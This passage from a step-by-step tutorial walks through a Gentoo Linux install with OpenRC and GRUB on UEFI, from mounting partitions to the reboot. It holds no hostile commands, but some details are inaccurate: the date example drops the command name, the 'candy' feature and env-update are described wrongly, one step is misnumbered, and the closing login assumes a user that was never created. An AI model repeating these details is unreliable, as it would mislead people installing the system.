Now, it&apos;s time to associate the root partition with the mount point:

```shell
mount /dev/vda3 /mnt/gentoo
```

By executing this command, you&apos;re linking your Gentoo root partition (/dev/vda3) with the `/mnt/gentoo` directory. This association allows you to access and configure the contents of your Gentoo installation within this directory. It&apos;s a pivotal step in setting up your Gentoo Linux system.

## Step 3: Setting the System Clock

Now, ensuring your system&apos;s clock is accurate is crucial. An incorrect system time can cause download errors and lead to issues post-installation. Here&apos;s a quick guide on how to verify and set the date and time in Gentoo.

### Checking Current Date and Time

Firstly, check your system&apos;s date and time by running the date command:

```shell
date
```

if the displayed date and time are significantly off, it needs to be corrected.

### Automatic Time Sync

Automatic time synchronization using a time server is the best option. Gentoo&apos;s official live environments include the `chronyd` command, which can sync your system clock to UTC time using a time server. (`ntp.org`) Note that this method requires a working network configuration.

&gt;Warning: Automatic time sync reveals your system&apos;s IP address to the time server.

```shell
chronyd -q
```

### Manual Time Setting

The date command can manually set the system clock. Use the following format: `MMDDhhmmYYYY (Month, Day, Hour, Minute, and Year)`.

```shell
date &lt;MMDD&gt;&lt;hhmm&gt;&lt;YYYY&gt;
```

Set the system clock to the current date and time by replacing `&lt;MMDD&gt;&lt;hhmm&gt;&lt;YYYY&gt;` with the appropriate values.

#### Example for Setting day

To set the date to Friday October 20, 16:40:

```shell
102016402023
```

Now, it’s time to download Stage3 Tarball.

## Step 4: Downloading the Stage3 Tarball

### Navigate to the Installation Directory

Begin by changing your working directory to `/mnt/gentoo`, which is where you&apos;ll install Gentoo. This location serves as the foundation for your Gentoo Linux system.

```shell
cd /mnt/gentoo
```

### Download the Stage3 Tarball

The Stage3 tarball is a crucial component of your Gentoo installation, containing the base system files. To obtain it, we&apos;ll use the text-based web browser called `links`. Follow these steps to access the official Gentoo website and download the Stage3 tarball tailored to your architecture:

1. Launch `links` by typing `links` into the terminal and pressing Enter.

2. In `links`, enter `g` to access the URL prompt, and then type the URL for [gentoo.org](https://www.gentoo.org/).

3. Once you&apos;ve entered the Gentoo website, navigate to the Stage3 tarball download section. Look for the appropriate Stage3 OpenRC file corresponding to your architecture (e.g., amd64).

4. Select the desired tarball file, initiate the download process, and save it to your system.

5. After the download completes successfully, exit the `links` program by pressing `ctrl+c`.

With these actions, you&apos;ve obtained the necessary Stage3 tarball, a foundational component for your Gentoo Linux installation. This tarball provides the core system files required to build and customize your Gentoo environment.

## Step 5: Extract the Tarball

Once you&apos;ve downloaded the Gentoo system, it&apos;s time to extract it.

&gt;Please Ensure you include the following options. This very important

### Extract the Tarball
```shell
tar xpvf stage3-*.tar.xz --xattrs-include=&apos;*.*&apos; --numeric-owner
```

Unpacking the Stage3 tarball using this command sets up the groundwork for your Gentoo system.

### Delete tar file

After successfully extracting the Gentoo system, you can safely delete the tarball.

```shell
rm -rfv stage3-*.tar.xz
```

## Step 6: Configuring make.conf

Gentoo Linux is renowned for its customization potential, offering users the ability to compile and configure their systems according to specific needs. In this step, we&apos;ll focus on enhancing compilation speed, refining the aesthetics of terminal output and GPU Support.

### Edit `make.conf`

```shell
nano /mnt/gentoo/etc/portage/make.conf
```

Open the `make.conf` file for customization. This file holds crucial configuration options for the Portage package manager, providing a platform for tailoring your system to your preferences.

### Fine-Tune Compiler Flags

```shell
COMMON_FLAGS=&quot;-march=native -O2 -pipe&quot;
FEATURES=&quot;candy parallel-fetch parallel-install&quot;
MAKEOPTS=&quot;-j20&quot;
```

Within `make.conf`, you can set compiler flags to optimize system performance. Adjust these flags to align with your CPU architecture and personal preferences.

### Understanding the Flags

In Gentoo Linux, `make.conf` is a pivotal configuration file enabling you to optimize software package compilation and overall performance. The following flags offer customization options:

#### `COMMON_FLAGS=&quot;-march=native -O2 -pipe&quot;`

- `-march=native`: Directs the compiler to generate code tailored to your system&apos;s CPU architecture, automatically detecting your CPU type during compilation for optimized performance.
- `-O2`: Sets the optimization level for the compiler. `-O2` strikes a balance, improving code execution speed without significantly increasing compilation time.
- `-pipe`: Enables the use of pipes instead of temporary files for communication between different compilation stages, streamlining the process and reducing disk I/O.

#### `FEATURES=&quot;candy parallel-fetch parallel-install&quot;`

- `candy`: Potentially a custom or project-specific feature that may not be standard in all Gentoo installations, possibly related to additional optimizations or project-specific features.
- `parallel-fetch`: When enabled, permits Portage to download source code and files for packages concurrently, expediting the package installation process.
- `parallel-install`: Allows Portage to install multiple packages concurrently, particularly advantageous on systems with multiple CPU cores.

#### `MAKEOPTS=&quot;-j20&quot;`

- `-j20`: Specifies the number of parallel compilation jobs Portage can run simultaneously, allowing up to 20 parallel jobs. Adjust this value based on your system&apos;s CPU core count.

### GPU Support

To ensure optimal performance and compatibility with your hardware, consider adding the following configurations for mouse, keyboard, and GPU support in your Gentoo system.

#### Mouse, Keyboard, and Synaptics Touchpad Support:

```shell
INPUT_DEVICES=&quot;libinput synaptics&quot;
```

#### NVIDIA Cards:

```shell
VIDEO_CARDS=&quot;nouveau&quot;
```

#### Support for AMDGPU, RadeonSI, and AMD/ATI Cards:

```shell
VIDEO_CARDS=&quot;amdgpu radeonsi radeon&quot;
```

These configurations provide comprehensive support for input devices and graphics cards on your Gentoo system. Customize these settings based on your specific hardware and preferences, ensuring a seamless and optimized computing experience.

## Step 7: Repository Configuration

In this step, we establish the necessary configuration for managing package repositories using Portage, Gentoo&apos;s package manager. This allows you to define additional repositories beyond the defaults.

### Create the repos.conf Directory

To begin, create the `repos.conf` directory within the `/mnt/gentoo/etc/portage/` path:

```shell
mkdir --parents /mnt/gentoo/etc/portage/repos.conf
```

This directory is crucial for housing repository configurations.

### Copy Default Repository Configuration

Next, duplicate the default Gentoo repository configuration to ensure Portage can locate software packages. Execute the following command:

```shell
cp /mnt/gentoo/usr/share/portage/config/repos.conf /mnt/gentoo/etc/portage/repos.conf/gentoo.conf
```

This command copies the default repository settings from their typical location in `/usr/share/portage/config/repos.conf` to the specific location `/mnt/gentoo/etc/portage/repos.conf/gentoo.conf`. By doing this, you provide Portage with the necessary information to access software repositories.

## Step 8: Network Configuration files

Same, In Gentoo network configuration is not set up by default, so you&apos;ll need to configure it manually to ensure proper network connectivity within your Gentoo environment. Follow these steps to set up your network.

### Copy the Host System&apos;s resolv.conf

Begin by copying the DNS resolver configuration from the host system to your Gentoo environment:

```shell
cp --dereference /etc/resolv.conf /mnt/gentoo/etc/
```

The `/etc/resolv.conf` file on the host system contains essential DNS resolver settings, enabling domain name resolution. By copying it to `/mnt/gentoo/etc/`, you ensure that Gentoo can also resolve domain names correctly. This step is crucial for maintaining consistent and reliable internet connectivity within your Gentoo installation.

Setting up network configuration correctly is essential for various system functions and software package management. This step ensures that your Gentoo environment can access the internet and external resources as needed.

## Step 9: Mounting System Directories

In this section, we mount essential system directories within the Gentoo environment. These directories play critical roles in the functioning of the Linux system.

### Mount /proc

```shell
mount --types proc /proc /mnt/gentoo/proc
```

The `/proc` directory provides a virtual filesystem that exposes information about running processes and the kernel&apos;s internal state. Mounting it within the Gentoo environment is essential for various system utilities and commands to retrieve process-related information.

### Mount /sys

```shell
mount --rbind /sys /mnt/gentoo/sys
mount --make-rslave /mnt/gentoo/sys
```

The `/sys` directory offers a view into the kernel&apos;s internal data structures and provides a way to interact with device drivers and kernel parameters. By mounting `/sys` with the `--rbind` option and making it a slave of `/mnt/gentoo/sys`, we ensure that the Gentoo environment can access kernel and hardware information, facilitating system configuration and management.

### Mount /dev

```shell
mount --rbind /dev /mnt/gentoo/dev
mount --make-rslave /mnt/gentoo/dev
```

The `/dev` directory is crucial for device interaction. It contains special files representing hardware devices and facilitates device-related operations. Mounting `/dev` with the `--rbind` option and making it a slave of `/mnt/gentoo/dev` ensures that the Gentoo environment can access and manage devices effectively.

### Mount /run

```shell
mount --bind /run /mnt/gentoo/run
mount --make-slave /mnt/gentoo/run
```

The `/run` directory is essential for the proper functioning of various system services and daemons. It stores runtime information, including sockets and process IDs. Mounting `/run` and making it a slave of `/mnt/gentoo/run` ensures that system services within the Gentoo environment can operate as expected, contributing to a smoothly running system.

## Step 10: Chrooting into the New Environment

Now that your Gentoo system is prepared and mounted, it&apos;s time to enter the new environment and start configuring it further, Follow these steps to chroot into the new environment:

### Enter the Chroot Environment

Execute the following command to enter the chroot environment, where you will perform system configurations and installations:

```shell
chroot /mnt/gentoo /bin/bash
```

This command initiates a process called &quot;chrooting,&quot; which stands for &quot;change root.&quot; It allows you to transition into the newly installed Gentoo environment as if it were your root directory. After running this command, any further commands you execute will affect the Gentoo environment, not the host system.

### Apply Profile

After entering the chroot environment, it&apos;s essential to load the system-wide profile settings from `/etc/profile`. This step ensures that all necessary environment variables and system configurations are in place, allowing you to work effectively within the Gentoo system. Execute the following command:

```shell
source /etc/profile
```

This command ensures that the profiles are applied correctly to your newly installed Gentoo system.

Chrooting into the new environment is a critical step in the Gentoo installation process, as it allows you to perform essential configurations and installations within the Gentoo environment itself. It&apos;s the point at which you transition from setting up the installation environment to configuring the actual Gentoo system.

## Step 11: EFI Partition (UEFI Users)

Now, is time to mount your EFI Partitoin for your `/boot`, this important for your booting into your gentoo system. Follow these step:

### Create the EFI Directory

For users installing Gentoo on a UEFI (Unified Extensible Firmware Interface) system, creating the EFI directory is a crucial preparatory step. Here&apos;s what each component means:

- `mkdir /efi`: This command creates a directory named &quot;efi&quot; at the root of the file system. This directory will serve as the mounting point for the EFI system partition (ESP).

```shell
mkdir /efi
```

UEFI-based systems use the EFI system partition to store bootloader files and related information required for the boot process. By creating this &quot;efi&quot; directory, we establish the location where we will later mount the EFI partition.

### Mount the EFI Partition

After creating the &quot;efi&quot; directory, we proceed to mount the EFI partition onto this directory:

```shell
mount /dev/vda1 /efi
```

- `mount /dev/vda1 /efi`: This command instructs the system to mount the EFI partition, which is typically identified as `/dev/vda1`, onto the `/efi` directory. Mounting the EFI partition in this way ensures that the UEFI firmware can locate and access the necessary bootloader files and configuration data during the system&apos;s boot process.

In summary, this step is crucial for UEFI-based systems, as it sets up the directory structure and mounting point needed for successful UEFI booting, allowing Gentoo Linux to start correctly in such environments.

## Step 12: Initial Configuration

In this step, we&apos;ll perform the initial configuration for your Gentoo system. Synchronizing your file system.

### Synchronize Portage Tree

On your first Gentoo installation, it&apos;s essential to synchronize your Portage tree database. You can achieve this by running the following command:

```shell
emerge-webrsync
```

- The `emerge-webrsync` command is a crucial step in keeping your Gentoo system up to date. It initiates the synchronization of the Portage tree, which is a critical component responsible for managing packages and their metadata. Synchronizing the Portage tree ensures that your system has access to the latest package information and updates. Please be patient, as this process may take some time. You can use this time for a break or grab a meal while it completes.

### Read Gentoo News

One of the interesting features of Gentoo is the ability to read package news using the `eselect` command. After completing the Portage tree synchronization, you can use the following command to stay informed about important Gentoo news:

```shell
eselect news read
```

- The `eselect news read` command allows you to access and read package news, which provides updates and information about changes within the Gentoo system. Staying up-to-date with Gentoo news is essential for understanding system updates and being aware of potential issues or important changes.

Gentoo&apos;s flexibility and features, such as the ability to read package news, make it a unique and powerful Linux distribution for experienced users.

### Update the System Profile

In this step, we will install the packages listed in your world file, and for that, we need to select an appropriate system profile.

#### List Available System Profiles

Begin by listing the available system profiles with the following command:

```shell
eselect profile list
```

- The `eselect profile list` command provides you with a list of available system profiles. Each profile defines specific settings and configurations for your Gentoo system. You can choose from various profiles based on your requirements and preferences.

#### Set a System Profile

Next, select a system profile that aligns with your needs using the `eselect profile set` command. Replace the number &quot;5&quot; in the command below with the profile number you want to set:

```shell
eselect profile set 5
```

- Using the `eselect profile set` command, you can choose a system profile that best matches your desired system configuration. Keep in mind that the available profiles may vary, so select the one that suits your requirements.

#### Confirm the Selected Profile

Finally, it&apos;s essential to confirm that the correct system profile has been selected. This verification step ensures that your Gentoo system is configured as intended and aligns with your chosen specifications. Use the following command to confirm the selected profile:

```shell
eselect profile list
```

By following these steps, you ensure that your Gentoo system is configured with the appropriate profile, setting the stage for a well-customized and efficient environment.

## Selecting Fast Mirrors for Source Downloads (Optional)

To optimize your source downloads and ensure a swift installation process, choosing a fast mirror is highly recommended. Portage, Gentoo&apos;s package manager, relies on the `GENTOO_MIRRORS` variable in the `make.conf` file to determine the mirrors to use. Here&apos;s how you can conveniently select mirrors using the `mirrorselect` tool:

### Using `mirrorselect` Tool

1. **Install `mirrorselect` Tool:**
   Ensure you have the `mirrorselect` tool installed. If not, you can install it using:

   ```shell
   emerge --ask app-portage/mirrorselect
   ```

2. **Run `mirrorselect`:**
   Execute the following command to initiate `mirrorselect`:

   ```shell
   mirrorselect -i -o &gt;&gt; /etc/portage/make.conf
   ```

   This command queries the available mirrors and appends the selected mirrors to your `make.conf` file, optimizing your source downloads.

3. **Selecting Mirrors:**
   - Use the arrow keys to navigate to your preferred mirror(s) in the list displayed.
   - Press the `spacebar` to select one or more mirrors.
   - Once selected, press `Enter` to confirm your choice(s).

By using `mirrorselect`, you ensure that Portage fetches packages from nearby mirrors, significantly enhancing download speeds. This step is optional but highly recommended for a smoother Gentoo installation experience.

## Step 13: Updating the System

Now, let&apos;s proceed with updating your Gentoo system, which involves updating all installed packages, resolving dependencies, and potentially compiling new package versions.

### Update the System

Run the following command to update the entire system, including packages:

```shell
emerge --ask --verbose --update --deep --newuse @world
```

- The `emerge --ask --verbose --update --deep --newuse @world` command performs a comprehensive system update. It checks for updates to all installed packages, resolves dependencies, and considers any new USE flags (`--newuse`). This ensures that your Gentoo system is up to date with the latest software versions and security patches.

### Cleanup

After the system update, you can optimize your Gentoo system by removing unnecessary dependencies and packages:

```shell
emerge --depclean
```

The `emerge --depclean` command helps free up disk space and improve system performance by removing packages that are no longer needed after the update.

## Step 14: Licensing

Software licenses play a crucial role in Gentoo, as they determine which software can be installed based on your acceptance or rejection of these licenses. By default, Gentoo requires you to manually configure your license preferences. Here, we&apos;ll set up Gentoo to accept all licenses, but you can customize this based on your preferences.

### Edit make.conf

To customize your license acceptance preferences, you need to add a line to your `make.conf` file. You can do this using a single command or by manually editing the file.

#### Option 1: Adding the Line Automatically

Run the following command to add the necessary line to your `make.conf` file:

```shell
echo &apos;ACCEPT_LICENSE=&quot;*&quot;&apos; &gt;&gt; /etc/portage/make.conf
```

This command appends the line `ACCEPT_LICENSE=&quot;*&quot;` to your `make.conf` file, which indicates that you accept all licenses for packages. It allows you to install any software without being restricted by license agreements. However, please exercise caution and ensure that you comply with the licenses of the software you install, as some licenses may have specific requirements.

#### Option 2: Manual Editing

Alternatively, you can manually edit your `make.conf` file and add the following line:

```shell
ACCEPT_LICENSE=&quot;*&quot;
```

By setting `ACCEPT_LICENSE=&quot;*&quot;`, you configure Gentoo to accept all licenses, thereby enabling the installation of software without license-based restrictions.

Customizing your license acceptance preferences in Gentoo provides flexibility while also ensuring that you comply with software licenses. Make sure to choose the option that aligns with your licensing preferences and requirements.

## Step 15: Time Zone Configuration

Configuring the correct time zone is essential for your system to maintain accurate time settings. Follow these steps to set up your time zone in Gentoo:

### List Available Time Zones

Begin by listing the available time zones to find the one that corresponds to your region. You can use the following command to list the available time zone files:

```shell
ls /usr/share/zoneinfo/
```

This command provides a list of available time zone files. You&apos;ll need to choose the one that represents your region.

### Set Time Zone

Once you&apos;ve identified the time zone file that matches your location, you can set your system&apos;s time zone by adding a line with the chosen time zone file path. For example, if your time zone is &quot;Asia/Taipei,&quot; use the following command:

```shell
echo &quot;Asia/Taipei&quot; &gt; /etc/timezone
```

&gt;Notes: Replace &quot;Asia/Taipei&quot; with the path to your specific time zone file.

This command specifies your preferred time zone, ensuring that your Gentoo system displays the correct local time.

### Configure Time Zone Data

To complete the time zone configuration, you need to configure the time zone data to align with your chosen time zone. Use the following command to perform this configuration:

```shell
emerge --config sys-libs/timezone-data
```

Running `emerge --config sys-libs/timezone-data` ensures that your system&apos;s time settings are accurate and synchronized with your selected time zone.

## Step 16: Locale Configuration

Configuring the correct locale settings is crucial for defining your system&apos;s language and regional preferences. Follow these steps to set up your locale configuration in Gentoo:

### Edit locale.gen

1. **Uncomment Locale Settings:** Begin by uncommenting the locale settings that match your preferred language and regional settings. Use a text editor to open the `locale.gen` file, for example:

    ```shell
    nano /etc/locale.gen
    ```

    Within the `locale.gen` file, you can enable the desired locales by removing the `#` symbol in front of them. Locales define language and regional settings.

### Generate Locales

2. **Generate Locales:** After you&apos;ve uncommented and saved the changes to the `locale.gen` file, you can generate the specified locales using the following command:

    ```shell
    locale-gen
    ```

    Running `locale-gen` generates the locales that you specified in the `locale.gen` file. These locales support different languages and regional settings, allowing you to configure your system for multiple languages if needed.

### List Available Language Options

3. **List Available Language Options:** To verify that the desired locales have been successfully generated, you can list the available language options using the following command:

    ```shell
    eselect locale list
    ```

    The `eselect locale list` command provides you with a list of available locales, helping you confirm that your system can support your chosen language and region.

### Set Default Locale

4. **Set Default Locale:** To set the default locale for your system, use the `eselect locale set` command followed by the number associated with your preferred locale. For example, to set the default locale to &quot;en_US.utf8,&quot; you might use:

    ```shell
    eselect locale set 6
    ```

    The exact locale number may vary depending on your system&apos;s available options. Adjust this setting according to your language and regional preferences.

### Update Environment Variables

5. **Update Environment Variables:** Finally, update the environment variables and apply the changes to the system&apos;s locale settings with the following commands:

    ```shell
    source /etc/profile
    env-update
    ```

    Running `source /etc/profile` ensures that the changes to the locale settings take effect. It&apos;s an essential step to make sure your system correctly uses the specified language and regional settings.

By following these steps, you can customize your Gentoo system&apos;s language and regional settings, tailoring it to your specific language preferences and requirements.

#### `env-update`

In Gentoo Linux, the `env-update` command plays a vital role in synchronizing system settings configured in various files with the actual runtime environment of your system. It ensures that changes made to important configuration files are immediately reflected in the environment, enabling the system to function correctly based on the updated settings.

Here&apos;s how `env-update` works:

1. **Configuration File Inspection:** `env-update` scans critical configuration files across your Gentoo system. These files contain essential system-wide settings, such as locales, paths, and various variables that influence system behavior.

2. **Environment Variable Update:** Based on the information gathered from the configuration files, `env-update` takes action to update the environment variables of the system. These environment variables are essential as they dictate how processes and applications should behave.

3. **Instantaneous Impact:** One of the key benefits of `env-update` is that it enacts changes instantly. There&apos;s no need to reboot your system or log in and out for the updates to take effect. This means that the updated settings become immediately available to all processes and users on the system.

To illustrate its importance, consider the locale configuration discussed earlier. After configuring locales in Gentoo, running `env-update` ensures that your chosen language and regional settings are consistently applied across all applications and processes without any delay.

In summary, `env-update` serves as a critical bridge between the static configuration files and the dynamic runtime environment of Gentoo Linux. Its role is fundamental in maintaining system-wide consistency and facilitating the swift application of system-wide changes.

## Step 17: Firmware and Kernel

This step involves installing essential firmware and the Gentoo kernel to ensure proper hardware support and system functionality.

### Install Firmware

1. **Install Firmware Packages:**

   ```shell
   emerge --ask sys-kernel/linux-firmware
   ```

   Start by installing the necessary firmware packages required for effective hardware support. These packages provide essential firmware files for various hardware components.

2. **Intel CPU Microcode (Optional):**

   ```shell
   emerge --ask sys-firmware/intel-microcode
   ```

   If you have an Intel CPU, consider installing Intel microcode updates. These updates enhance CPU performance and security by addressing microcode vulnerabilities. Ensure that your CPU is supported before installing this package.

### Install Gentoo Kernel

3. **Install Gentoo Kernel:**

   ```shell
   emerge --ask sys-kernel/gentoo-kernel
   ```

   Install the Gentoo kernel, a critical component of your Gentoo Linux system. The kernel serves as the core of the operating system, providing essential hardware support and system functionality.

4. **List Available Kernels:**

   ```shell
   eselect kernel list
   ```

   List the available kernels to help you select the appropriate one for your system. This step is crucial to ensure that you choose the correct kernel configuration that matches your hardware and requirements.

Installing firmware and the Gentoo kernel is vital for the proper functioning of your Gentoo Linux system, ensuring that it&apos;s equipped with the necessary hardware support and system core.

## Step 18: Filesystem Configuration

In this step, you will configure your filesystem by editing the `/etc/fstab` file, which contains information about how various partitions are mounted and used by your system.

### Edit /etc/fstab

Open the `/etc/fstab` file for editing using a text editor, such as Nano:

```shell
nano /etc/fstab
```

Inside the `/etc/fstab` file, add entries for different partitions based on your system configuration. Here&apos;s an example of what the entries might look like:

```shell
# EFI Partition
/dev/vda1   /efi        vfat    defaults    0 2

# Swap Partition
/dev/vda2   none        swap    sw          0 0

# Root Partition
/dev/vda3   /           btrfs   defaults,noatime  0 1
```

Here&apos;s an explanation of each entry:

1. `/dev/vda1` is mounted at `/efi` and uses the VFAT filesystem.
2. `/dev/vda2` is designated as a swap partition.
3. `/dev/vda3` is mounted as the root directory and uses the Btrfs filesystem. It also specifies mount options, such as &quot;defaults&quot; and &quot;noatime.&quot;

Ensure that you adjust these entries to match your actual disk partitioning and filesystem choices. Properly configuring `/etc/fstab` is essential for ensuring that your system mounts and utilizes partitions correctly during startup and operation.

## Step 19: Setting Network Information

In this step, you will configure network-related settings to ensure proper communication and connectivity on your Gentoo Linux system. Each command provided is independent of the others.

### Edit the Hosts File

```shell
nano /etc/hosts
```

- `nano /etc/hosts`: Use this command to open and edit the `/etc/hosts` file. This file is responsible for mapping hostnames to IP addresses and is crucial for network communication.

Add the following lines to the file:

```shell
127.0.0.1   gentoo   localhost
::1         localhost
```

These lines define the loopback address (`127.0.0.1`) and the IPv6 loopback address (`::1`) with corresponding hostnames. The &quot;gentoo&quot; hostname is associated with the loopback address.

### Set the Hostname

```shell
echo gentoo &gt; /etc/hostname
```

- `echo gentoo &gt; /etc/hostname`: Use this command to set the hostname of your Gentoo system. In this example, the hostname is set to &quot;gentoo.&quot; Make sure to replace &quot;gentoo&quot; with your desired hostname if needed.

### Install and Configure DHCP

```shell
emerge --ask net-misc/dhcpcd
```

- `emerge --ask net-misc/dhcpcd`: This command installs `dhcpcd`, a DHCP (Dynamic Host Configuration Protocol) client, which is essential for automatically configuring network interfaces.

```shell
rc-update add dhcpcd default
```

- `rc-update add dhcpcd default`: Add `dhcpcd` to the list of services that start automatically at boot. This ensures that the DHCP client service runs during system startup, enabling automatic network configuration.

```shell
rc-service dhcpcd start
```

- `rc-service dhcpcd start`: Use this command to start the `dhcpcd` service immediately. It will configure network interfaces and establish network connectivity.

By following these steps, you&apos;ve configured network-related settings on your Gentoo Linux system, including hostname setup, host file editing, and the installation and configuration of a DHCP client for automatic network configuration. Your system should now be ready to communicate over the network.

## Step 20: Network Configuration

Configuring your network correctly is essential for proper system functionality. Follow these steps to configure your network interfaces in Gentoo:

### Identify Network Interfaces

Use the following command to identify the names of available network interfaces on your system, including both active and inactive interfaces:

```shell
ifconfig -a
```

This command will display a list of network interfaces, helping you determine the correct interface name that you need for configuration.

### Configure Network Interfaces

Edit the network interface configurations in the `/etc/conf.d/net` file to suit your specific network requirements. You can use a text editor like Nano for this purpose:

```shell
nano /etc/conf.d/net
```

Inside the `/etc/conf.d/net` file, configure your network interfaces as needed. For example, you can set up DHCP for your Ethernet interface or configure static IP addresses. Here&apos;s an example configuration for DHCP:

```shell
config_enp1s0=&quot;dhcp&quot;
```

Replace &quot;enp1s0&quot; with the actual name of your network interface. Adjust the configuration based on your network setup.

### Create a Symbolic Link

Navigate to the `/etc/init.d/` directory, which is used for managing system services:

```shell
cd /etc/init.d/
```

Create a symbolic link for your network interface, simplifying its management:

```shell
ln -s net.lo net.enp1s0
```

Replace &quot;enp1s0&quot; with the actual name of your network interface.

### Start Network Interface at Boot

Ensure that the network interface starts automatically with the system by adding it to the default runlevel:

```shell
rc-update add net.enp1s0 default
```

Make sure to replace &quot;enp1s0&quot; with the correct interface name for your system configuration.

By following these steps, you&apos;ll properly configure your network interfaces in Gentoo, ensuring that they start automatically and provide stable connectivity for your system.

## Step 21: Setting the Root Password

Securing your Gentoo system starts with setting a strong and secure root password. The root account is a powerful administrative account that should only be accessed by authorized users when necessary. Follow these steps to set the root password:

### Set Root Password

To set a secure root password, use the `passwd` command:

```shell
passwd
```

After entering this command, you&apos;ll be prompted to enter and confirm your new root password. Make sure to choose a password that is both strong and memorable. A strong password typically includes a combination of uppercase and lowercase letters, numbers, and special characters. It&apos;s important to keep this password confidential and not share it with unauthorized users.

Setting a strong root password is a critical security measure for your Gentoo system, as it helps protect your system from unauthorized access and ensures that only trusted users can perform administrative tasks.

## Step 2: File System Support

To effectively manage various filesystems on your Gentoo system, it&apos;s important to have the necessary tools and utilities installed. This step focuses on installing `sys-fs/btrfs-progs` and `sys-fs/dosfstools` to support Btrfs and DOSFAT filesystems, respectively. Follow these instructions to ensure you have the required filesystem support:

### Install Btrfs Tools

[Btrfs](https://btrfs.readthedocs.io/en/latest/) is a modern and feature-rich filesystem that offers benefits like snapshots and data integrity. To manage Btrfs filesystems on your Gentoo system, you&apos;ll need the `btrfs-progs` package. Use the following command to install it:

```shell
emerge -av sys-fs/btrfs-progs
```

This command will install the Btrfs tools, enabling you to create, manage, and maintain Btrfs filesystems on your Gentoo installation.

### Install DOSFAT Tools

DOSFAT (also known as FAT) is a filesystem format commonly used for removable storage devices such as USB drives and SD cards. To interact with DOSFAT filesystems on your Gentoo system, you&apos;ll need the `dosfstools` package. Use the following command to install it:

```shell
emerge -av sys-fs/dosfstools
```

Installing `dosfstools` provides utilities like `mkfs.fat` for formatting DOSFAT filesystems and `fsck.fat` for checking and repairing them.

With both `sys-fs/btrfs-progs` and `sys-fs/dosfstools` installed, your Gentoo system will have comprehensive filesystem support, allowing you to work with a variety of filesystem formats as needed. This flexibility is essential for managing data on different storage devices and maintaining the integrity of your files.

## Step 23: Configuring the GRUB Bootloader

Configuring the GRUB bootloader is a crucial step in setting up your Gentoo Linux system for booting. GRUB (GRand Unified Bootloader) is responsible for managing the boot process and allows you to choose which operating system to start. In this step, we&apos;ll configure and install GRUB for your Gentoo installation.

### Edit make.conf for GRUB

First, we need to specify the GRUB platform as &quot;efi-64&quot; in your `make.conf` file. This is essential for systems that use EFI for booting. To do this, execute the following command:

```shell
echo &apos;GRUB_PLATFORMS=&quot;efi-64&quot;&apos; &gt;&gt; /etc/portage/make.conf
```

This command appends the `GRUB_PLATFORMS` setting to your `make.conf` file, ensuring that GRUB is configured correctly for EFI booting.

### Install GRUB

Now that we&apos;ve configured GRUB, we need to install it on your system. Use the following command to install the GRUB bootloader:

```shell
emerge --ask --verbose sys-boot/grub
```

This command tells Gentoo&apos;s package manager, Portage, to install the `sys-boot/grub` package, which includes the GRUB bootloader.

#### Install GRUB to the EFI Partition

To ensure that your system can boot using the UEFI firmware, we&apos;ll install GRUB to the EFI partition. Use the following command to accomplish this:

```shell
grub-install --target=x86_64-efi --efi-directory=/efi
```

This command installs GRUB for the x86_64 EFI target architecture and specifies the EFI directory as `/efi`. It ensures that the necessary GRUB files are placed in the EFI partition, making them accessible to the UEFI firmware during the boot process.

#### Generate the GRUB Configuration File

The final step in configuring GRUB is to generate the GRUB configuration file, `grub.cfg`. This file contains the menu entries and settings required for booting into your Gentoo installation. Use the following command to generate the configuration file:

```shell
grub-mkconfig -o /boot/grub/grub.cfg
```

This command creates the `grub.cfg` file in the `/boot/grub` directory. It detects the installed operating systems and generates a boot menu based on the available options.

With these configurations and tools in place, your Gentoo Linux system is well-prepared for use. The GRUB bootloader is set up to handle the boot process, allowing you to select Gentoo Linux or other operating systems when you start your computer. You&apos;re now ready to finalize the installation and configure your user account.

## Step 24: Unmounting Partitions

As you near the completion of your Gentoo Linux installation, it&apos;s essential to unmount the various partitions and directories associated with the installation process. This ensures that your system is prepared for a clean and successful reboot.

```shell
exit
cd ~
```

### Unmounting Specific Directories

To begin, unmount specific directories within the Gentoo installation by executing the following command:

```shell
umount -l /mnt/gentoo/dev{/shm,/pts,}
```

- `umount -l /mnt/gentoo/dev{/shm,/pts,}`: This command unmounts several directories within the Gentoo installation, including `/dev`, `/dev/shm`, and `/dev/pts`. Unmounting these directories is essential to detach them from the installation environment.

### Unmounting the Entire Gentoo Installation

Next, unmount the entire Gentoo installation from the `/mnt/gentoo` directory using the following command:

```shell
umount -R /mnt/gentoo
```

- `umount -R /mnt/gentoo`: This command recursively unmounts all filesystems and directories within the `/mnt/gentoo` directory. It ensures that every component of the Gentoo installation is properly detached from the system.

## Step 25: Reboot Your System

With all the necessary unmounting completed, it&apos;s time to reboot your system to initiate the use of the newly installed Gentoo Linux.

```shell
reboot
```

- `reboot`: Execute this command to reboot your system gracefully. After the reboot, you&apos;ll encounter the GRUB menu, which allows you to select your desired operating system. Use the arrow keys to highlight &quot;Gentoo&quot; and then press Enter to boot into your freshly installed Gentoo Linux system.

Rebooting is the final step in the installation process, and once your system restarts, you&apos;ll have access to your new Gentoo Linux environment. Congratulations on successfully installing Gentoo!

![Grub has been installed!](./grub-done.png)

## Final Step: Testing Your System

Congratulations! You&apos;ve successfully installed Gentoo Linux, and now it&apos;s time to test your system to ensure everything is working as expected.

### Login your system

Once your system has rebooted, you should see the login prompt. Log in using the username and password you configured during the installation process.

![login](./login.png)

## Conclusion

Congratulations! You&apos;ve successfully installed Gentoo Linux with using the OpenRC init system. This installation process, although detailed, provides you with a highly customizable and optimized Linux system tailored to your specific needs.

Throughout this comprehensive guide, you&apos;ve learned how to:

1. Set up the initial environment and prerequisites.
2. Create and format partitions.
3. Set up the system clock and download the Stage3 tarball.
4. Configure important files like `make.conf` and `/etc/fstab`.
5. Set the hostname and configure network settings.
6. Install essential software and firmware.
7. Configure the bootloader (GRUB for UEFI systems).

Gentoo Linux&apos;s source-based package management system, Portage, allows you to fine-tune your system to your liking and keep it up to date. While the installation process may be intricate, the result is a highly customizable and efficient Linux distribution that can be tailored to your specific use cases.

## What next?

Time to install Your windows and Desktop Enviroment, Follow our guided Here:

- [Gentoo Open-RC: Install XORG and xfce]

### Next Level?

It&apos;s time to give Linux From Scratch (LFS) a shot! If Gentoo represents a high-level installation process and Arch falls into the intermediate category, LFS takes it to an entirely different level. This is a full-fledged installation of Linux from scratch, starting from ground zero.

Become a Linux master!

![LFS](https://heshambahram.com/wp-content/uploads/2018/06/Linux-From-Scratch-1024x652.jpg)

### What I want to say

Installing Gentoo for the first time was quite an experience. It wasn&apos;t particularly difficult to set up, but what did catch me off guard was the extensive compilation process that spanned over half a day. Personally, I have a preference for compiling over using pre-built packages, but it really comes down to your own preferences.

